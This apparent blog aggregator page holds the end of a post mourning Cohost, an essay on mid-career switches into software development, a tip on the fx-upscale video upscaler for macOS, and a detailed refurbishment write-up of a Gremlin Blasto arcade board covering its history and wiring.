means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds of being both technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate if that includes copying some of twitter's worst mistakes. Looking Forward When it became clear that I was going to walk away from my twitter account there was fear and anxiety. I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-nit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright. So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

9 months ago 19 votes

More in technology

From building ships to shipping builds: how to succeed in making a career switch to software development

I have worked with a few software developers who made the switch to this industry in the middle of their careers. A major change like that can be scary and raise a lot of fears and doubts, but I can attest that this can work out well with the right personality traits and a supporting environment. Here’s what I’ve observed. To keep the writing concise, I’ll be using the phrase “senior junior”1 to describe those that have made such a career switch. Overcoming the fear Fear is a natural reaction to any major change in life, especially when there’s risk of taking a financial hit while you have a family to support and a home loan to pay. The best mitigation that I’ve heard is believing that you can make the change, successfully. It sounds like an oversimplification, sure, as all it does is that it removes a mental blocker and throws out the self-doubt. And yet it works unreasonably well. It also helps if you have at least some savings to help mitigate the financial risk. A years’ worth of expenses saved up can go a long way in providing a solid safety net. What makes them succeed A great software developer is not someone that simply slings some code over the wall and spends all of their day working only on the technical stuff, there are quite a few critical skills that one needs to succeed. This is not an exhaustive list, but I’ve personally observed that the following ones are the most critical: ability to work in a team great communication skills conflict resolution ability to make decisions in the context of product development and business goals maintaining an environment of psychological safety Those with more than a decade of experience in another role or industry will most likely have a lot of these skills covered already, and they can bring that skill set into a software development team while working with the team to build their technical skill set. Software development is not special, at the end of they day, you’re still interacting with humans and everything that comes with that, good or bad. After working with juniors that are fresh out of school and “senior juniors” who have more career experience than I do, I have concluded that the ones that end up being great software developers have one thing in common: the passion and drive to learn everything about the role and the work we do. One highlight that I often like to share in discussions is one software developer who used to work in manufacturing. At some point they got interested in learning how they can use software to make work more efficient. They started with an MVP solution involving a big TV and Google Sheets, then they started learning about web development for a solution in a different area of the business, and ended up building a basic inventory system for the warehouse. After 2-3 years of self-learning outside of work hours and deploying to production in the most literal sense, they ended up joining my team. They got up to speed very quickly and ended up being a very valuable contributor in the team. In another example, I have worked with someone who previously held a position as a technical draftsman and 3D designer in a ship building factory (professionals call it a shipyard), but after some twists and turns ended up at a course for those interested in making a career switch, which led to them eventually working in the same company I do. Now they ship builds with confidence while making sure that the critical system we are working on stays stable. That developer also kicks my ass in foosball about 99% of the time. The domain knowledge advantage The combination of industry experience and software development skills is an incredibly powerful one. When a software developer starts work in a project, they learn the business domain piece by piece, eventually reaching a state where they have a slight idea about how the business operates, but never the full picture. Speaking with their end users will help come a long way, but there are always some details that get lost in that process. Someone coming from the industry will have in-depth knowledge about the business, how it operates, where the money comes from, what are the main pain points and where are the opportunities for automation. They will know what problems need solving, and the basic technical know-how on how to try solving them. Like a product owner, but on steroids. Software developers often fall into the trap of creating a startup to scratch that itch they have for building new things, or trying out technologies that have for a very long time been on their to-do list. The technical problems are fun to solve, sure, but the focus should be on the actual problem that needs fixing. If I wanted to start a new startup with someone, I’d look for someone working in an industry that I’m interested in and who understands the software development basics. Or maybe I’m just looking for an excellent product owner. How to help them succeed If you have a “senior junior” software developer on your team, then there really isn’t anything special you’d need to do compared to any other new joiner. Do your best to foster a culture of psychological safety, have regular 1-1s with them, and make sure to pair them up with more experienced team members as often as possible. A little bit of encouragement in challenging environments or periods of self-doubt can also go a long way. Temporary setbacks are temporary, after all. What about “AI”? Don’t worry about all that “AI”2 hype, if it was as successful in replacing all software development jobs as a lof of people like to shout from the rooftops, then it would have already done so. At best, it’s a slight productivity boost3 at the cost of a huge negative impact on the environment. Closing thoughts If you’re someone that has thought about working as a software developer or who is simply excited about all the ways that software can be used to solve actual business problems and build something from nothing, then I definitely recommend giving it a go, assuming that you have the safety net and risk appetite to do so. For reference, my journey towards software development looked like this, plus a few stints of working as a newspaper seller or a grocery store worker. who do you call a “senior senior” developer, a senile developer? ↩︎ spicy autocomplete engines (also known as LLM-s) do not count as actual artificial intelligence. ↩︎ what fascinates me about all the arguments around “AI” (LLM-s) is the feeling of being more productive. But how do you actually measure developer productivity, and do you account for possible reduced velocity later on when you’ve mistaken code generation speed as velocity and introduced hard to catch bugs into the code base that need to be resolved when they inevitably become an issue? ↩︎

13 hours ago 2 votes
This unique electronic toy helps children learn their shapes

It isn’t a secret that many kids find math to be boring and it is easy for them to develop an attitude of “when am I ever going to use this?” But math is incredibly useful in the real world, from blue-collar machinists using trigonometry to quantum physicists unveiling the secrets of our universe through […] The post This unique electronic toy helps children learn their shapes appeared first on Arduino Blog.

an hour ago 1 votes
A slept on upscaling tool for macOS

I uploaded YouTube videos from time to time, and a fun comment I often get is “Whoa, this is in 8K!”. Even better, I’ve had comments from the like, seven people with 8K TVs that the video looks awesome on their TV. And you guessed it, I don’t record my videos in 8K! I record them in 4K and upscale them to 8K after the fact. There’s no shortage of AI video upscaling tools today, but they’re of varying quality, and some are great but quite expensive. The legendary Finn Voorhees created a really cool too though, called fx-upscale, that smartly leverages Apple’s built-in MetalFX framework. For the unfamiliar, this library is an extensive of Apple’s Metal graphics library, and adds functionality similar to NVIDIA’s DLSS where it intelligently upscales video using machine learning (AI), so rather than just stretching an image, it uses a model to try to infer what the frame would look like at a higher resolution. It’s primarily geared toward video game use, but Finn’s library shows it does an excellent job for video too. I think this is a really killer utility, and use it for all my videos. I even have a license for Topaz Video AI, which arguably works better, but takes an order of magnitude longer. For instance my recent 38 minute, 4K video took about an hour to render to 8K via fx-upscale on my M1 Pro MacBook Pro, but would take over 24 hours with Topaz Video AI. # Install with homebrew brew install finnvoor/tools/fx-upscale # Outputs a file named my-video Upscaled.mov fx-upscale my-video.mov --width 7680 --codec h265 Anyway, just wanted to give a tip toward a really cool tool! Finn’s even got a [version in the Mac App Store called Unsqueeze](https://apps.apple.com/ca/app/unsqueeze/id6475134617 Unsqueeze) with an actual GUI that’s even easier to use, but I really like the command line version because you get a bit more control over the output. 8K is kinda overkill for most use cases, so to be clear you can go from like, 1080p to 4K as well if you’re so inclined. I just really like 8K for the future proofing of it all, in however many years when 8K TVs are more common I’ll be able to have some of my videos already able to take advantage of that. And it takes long enough to upscale that I’d be surprised to see TVs or YouTube offering that upscaling natively in a way that looks as good given the amount of compute required currently. Obviously very zoomed in to show the difference easier If you ask me, for indie creators, even when 8K displays are more common, the future of recording still probably won’t be in native 8K. 4K recording gives so much detail still that have more than enough details to allow AI to do a compelling upscale to 8K. I think for my next camera I’m going to aim for recording in 6K (so I can still reframe in post), and then continue to output the final result in 4K to be AI upscaled. I’m coming for you, Lumix S1ii.

yesterday 3 votes
Computer Games mag Interviews Don Bluth (1984)

Talks about the famous Dragon's Lair

2 days ago 4 votes
Refurb weekend: Gremlin Blasto arcade board

totally unreasonable price for a completely untested item, as-was, no returns, with no power supply, no wiring harness and no auxiliary daughterboards. At the end of this article, we'll have it fully playable and wired up to a standard ATX power supply, a composite monitor and off-the-shelf Atari joysticks, and because this board was used for other related games from that era, the process should work with only minor changes on other contemporary Gremlin arcade classics like Blockade, Hustle and Comotion [sic]. It's time for a Refurb Weekend. a July 1982 San Diego Reader article, the locally famous alternative paper I always snitched a copy of when I was downtown, and of which I found a marginally better copy to make these scans. There's also an exceptional multipart history of Gremlin you can read but for now we'll just hit the highlights as they pertain to today's project. ported to V1 Unix and has a simpler three-digit variant Bagels which was even ported to the KIM-1. Unfortunately his friends didn't have minicomputers of their own, so Hauck painstakingly put together a complete re-creation from discrete logic so they could play too, later licensed to Milton Bradley as their COMP IV handheld. Hauck had also been experimenting with processor-controlled video games, developing a simple homebrew unit based around the then-new Intel 8080 CPU that could connect to his television set and play blackjack. Fogleman met Hauck by chance at a component vendor's office and hired him on to enhance the wall game line, but Hauck persisted in his experiments, and additionally presented Fogleman with a new and different machine: a two-player game played with buttons on a video TV display, where each player left a boxy solid trail in an attempt to crowd out the other. To run the fast action on its relatively slow ~2MHz CPU and small amount of RAM, a character generator circuit made from logic chips painted a 256x224 display from 32 8x8 tiles in ROM specified by a 32x28 screen matrix, allowing for more sophisticated shapes and relieving the processor of having to draw the screen itself. (Does this sound like an early 8-bit computer? Hold that thought.) patent application was too late and too slow to stop the ripoffs. (For the record, Atari programmer Dennis Koble was adamant he didn't steal the idea from Gremlin, saying he had seen similar "snake" games on CompuServe and ARPANET, but Nolan Bushnell nevertheless later offered Gremlin $100,000 in "consolation" which the company refused.) Meanwhile, Blockade orders evaporated and Gremlin's attempts to ramp up production couldn't save it, leaving the company with thousands of unused circuit boards, game cabinets and video monitors. While lawsuits against the copycats slowly lumbered forward, Hauck decided to reprogram the existing Blockade hardware to play new games, starting with converting the Comotion board into Hustle in 1977 where players could also nab targets for additional points. The company ensured they had a thousand units ready to ship before even announcing it and sales were enough to recoup at least some of the lost investment. Hauck subsequently created a reworked version of the board with the same CPU for the more advanced game Depthcharge, initially testing poorly with players until the controls were simplified. This game was licensed to Taito as Sub Hunter and the board reworked again for the target shooter Safari, also in 1977, and also licensed by Taito. For 1978, Gremlin made one last release using the Hustle-Comotion board. This game was Blasto. present world record is 8,730), but in two player mode the players can also shoot each other for an even bigger point award. This means two-player games rapidly turn into active hunts, with a smaller bonus awarded to a player as well if the other gets nailed by a mine. shown above with a screenshot of the interactive on-board assembler. Noval also produced an education-targeted system called the Telemath, based on the 760 hardware, which was briefly deployed in a few San Diego Unified elementary schools. Alas, they were long gone before we arrived. Industry observers were impressed by the specs and baffled by the desk. Although the base price of $2995 [about $16,300] was quite reasonable considering its capabilities, you couldn't buy it without its hulking enclosure, which made it a home computer only to the sort of people who would buy a home PDP-8. (Raises hand.) Later upgrades with a Z80 and a full 32K didn't make it any more attractive to buyers and Noval barely sold about a dozen. Some of the rest remained at Gremlin as development systems (since they practically were already), and an intact upgraded unit with aftermarket floppy drives lives at the Computer History Museum. The failure of Noval didn't kill Gremlin outright, but Fogleman was concerned the company lacked sufficient capital to compete more strongly in the rapidly expanding video game market, and Noval didn't provide it. With wall game sales fading fast and cash flow crunched, the company was slowly approaching bankruptcy by the time Blasto hit arcades. At the same time, Sega Enterprises, Inc., then owned by conglomerate Gulf + Western (who also then owned Paramount Pictures), was looking for a quick way to revive its failing North American division which was only surviving on the strength of its aggressively promoted mall arcades. Sega needed development resources to bring out new games States-side, and Gremlin needed money. In September 1978 Fogleman agreed to make Gremlin a Sega subsidiary in return for an undisclosed number of shares, and became a vice chairman. Sega was willing to do just about anything to achieve supremacy on this side of the Pacific. In addition to infusing cash into Gremlin to make new games (as Gremlin/Sega) and distribute others from their Japanese peers and partners (as Sega/Gremlin), Sega also perceived a market opportunity in licensing arcade ports to the growing home computer segment. Texas Instruments' 99/4 had just hit the market in 1979 to howls there was hardly any software, and their close partner Milton Bradley was looking for marketable concepts for cartridge games. Blasto had simple fast action and a good name in the arcades, required only character graphics (well within the 9918 video chip's capabilities) and worked for both one or two players, and Sega had no problem blessing a home port of an older property for cheap. Milton Bradley picked up the license to Hustle as well. Bob Harris for completion, and TI house programmer Kevin Kenney wrote some additional features. 1 to 40 (obviously some thought was given to using the same PCB as much as possible). The power header is also a 10-pin block and the audio and video headers are 4-pin. Oddly, the manual doesn't say anywhere what the measurements are, so I checked them with calipers and got a pitch of around 0.15", which sounds very much like a common 0.156" header. I ordered a small pack of those as an experiment. 0002 because of the control changes: if you have an 814-0001, then you have a prototype. The MAME driver makes reference to an Amutech Mine Sweeper which is a direct and compatible ripoff of this board — despite the game type, it's not based on Depthcharge.) listed with the part numbers for the cocktail, but the ROM contents expected in the hashes actually correspond to the upright. Bipolar ROMs and PROMs are, as the name suggests, built with NPN bipolar junction transistors instead of today's far more common MOSFETs ("MOS transistors"). This makes them lower density but also faster: these particular bipolar PROMs have access times of 55-60ns as opposed to EPROMs or flash ROMs of similar capacity which may be multiple times slower depending on the chip and process. For many applications this doesn't matter much, but in some tightly-timed systems the speed difference can make it difficult to replace bipolar PROMs with more convenient EPROMs, and most modern-day chip programmers can't generate the higher voltage needed to program them (you're basically blowing a whole bunch of microscopic Nichrome metal fuses). Although modern CMOS PROMs are available at comparable speeds, bipolars were once very common, including in military environments where they could be manufactured to tolerate unusually harsh operating conditions. The incomparable Ken Shirriff has a die photo and article on the MMI 5300, an open-collector chip which is one of the military-spec parts from this line. Model 745 KSR and bubble memory Model 763 ASR, use AMD 8080s! The Intel 8080A is a refined version of the original Intel 8080 that works properly with more standard TTL devices (the original could only handle low-power TTL); the "NL" tag is TI's designation for a plastic regular-duty DIP. Its clock source is a 20.79MHz crystal at Y1 which is divided down by ten to yield the nominal clock rate of 2.079MHz, slightly above its maximum rating of 2MHz but stable enough at that speed. The later Intel 8080A-1 could be clocked up to 3.125MHz and of course the successor Intel 8085 and Zilog Z80 processors could run faster still. An interesting absence on this board is an Intel 8224 or equivalent to generate the 8080A's two-phase clock: that's done directly off the crystal oscillator with discrete logic, an elegant (and likely cheaper) design by Hauck. The video output also uses the same crystal. Next to the CPU are pads for the RAM chips. You saw six of them in the last picture under the second character ROM (316-0100M), all 2102 (1Kbit) static RAM. These were the chips I was most expecting to fail, having seen bad SRAM in other systems like my KIM-1. The ones here are 450ns Fairchild 21021 SRAMs in the 21021PC plastic case and "commercial" temperature range, and six of them adds up to 768 bytes of memory. NOS examples and equivalents are fortunately not difficult to find. Closer to the CPU in this picture, however, are two more RAM chip pads that are empty except for tiny factory-installed jumpers. On the Hustle and Blasto boards (both), they remain otherwise unpopulated, and there is an additional jumper between E4 and E5 also visible in the last picture. The Comotion board, however, has an additional 256 bytes of RAM here (as two more 1024x1 SRAMs). On that board these pads have RAM, there are no jumpers on the pads, and the jumper is now between E3 (ground) and E5. This jumper is also on Blockade, even though it has only five 2102s and three dummy jumpers on the other pads. That said, the games don't seem to care how much RAM is present as long as the minimum is: the current MAME driver gives all of them the full 1K. this 8080 system which uses a regulator). Tracing the schematic out further, the -12V line is also used with the +5V and +12V lines to run the video circuit. These are all part of the 10-pin power header. almost this exact sequence of voltages? An AT power supply connector! If we're clever about how we put the two halves on, we can get nearly the right lines in the right places. The six-pin AT P9 connector reversed is +5V, +5V, +5V, -5V, ground, ground, so we can cut the -5V to be the key. The six-pin AT P8 connector not reversed is power-good, +5V (or NC), +12V, -12V, ground, ground, so we cut the +5V to be the key, and cut the power-good line and one of the dangling grounds and wire ground to the power-good pin. Fortunately I had a couple spare AT-to-ATX converter cables from when we redid the AT power supply on the Alpha Micro Eagle 300. connectors since we're going to modify them anyway. A quick couple drops of light-cured cyanoacrylate into the key hole ... Something's alive! An LED glows! Time now for the video connector to see if we can get a picture! a nice 6502 reset circuit). The board does have its own reset circuit, of a sort. You'll notice here that the coin start is wired to the same line, and the manual even makes reference to this ("The circuitry in this game has been arranged so that the insertion of a quarter through the coin mechanism will reset the restart [sic] in the system. This clears up temporary problems caused by power line disturbances, static, etc."). We'll of course be dealing with the coin mechanism a little later, but that doesn't solve the problem of bringing the machine into the attract mode when powered on. I also have doubts that people would have blithely put coins into a machine that was obviously on the fritz. pair is up and down, or left and right, but not which one is exactly which because that depends on the joystick construction. We'll come back to this. Enterprises) to emphasize the brand name more strongly. The company entered a rapid decline with the video game crash of 1983 and the manufacturing assets were sold to Bally Midway with certain publishing rights, but the original Gremlin IP and game development teams stayed with Sega Electronics and remained part of Gulf+Western until they were disbanded. The brand is still retained as part of CBS Media Ventures today though modern Paramount Global doesn't currently use the label for its original purpose. In 1987 the old wall game line was briefly reincarnated under license, also called Gremlin Industries and with some former Gremlin employees, but only released a small number of new machines before folding. Meanwhile, Sega Enterprises separated from Gulf+Western in a 1984 management buyout by original founder David Rosen, Japanese executive Hayao Nakayama and their backers. This Sega is what people consider Sega today, now part of Sega Sammy Holdings, and the rights to the original Gremlin games — including Blasto — are under it. Lane Hauck's last recorded game at Gremlin/Sega was the classic Carnival in 1980 (I played this first on the Intellivision). After leaving the company, he held positions at various companies including San Diego-based projector manufacturer Proxima (notoriously later merging with InFocus), Cypress Semiconductor and its AgigA Tech subsidiary (both now part of Infineon), and Maxim Integrated Products (now part of Analog Devices), and works as a consultant today. I'm not done with Blasto. While I still enjoy playing the TI-99/4A port, there are ... improvements to be made, particularly the fact it's single fire, and it was never ported to anything else. I have ideas, I've been working on it off and on for a year or so and all the main gameplay code is written, so I just have to finish the graphics and music. You'll get to play it. And the arcade board? Well, we have a working game and a working harness that I can build off. I need a better sound amplifier, the "boom" circuit deserves a proper subwoofer, and I should fake up a little circuit using the power-good line from the ATX power supply to substitute for the power interrupt board. Most of all, though, we really need to get it a proper display and cabinet. That's naturally going to need a budget rather larger than my typical projects and I'm already saving up for it. Suggestions for a nice upright cab with display, buttons and joysticks that I can rewire — and afford! — are solicited. On both those counts, to be continued.

2 days ago 6 votes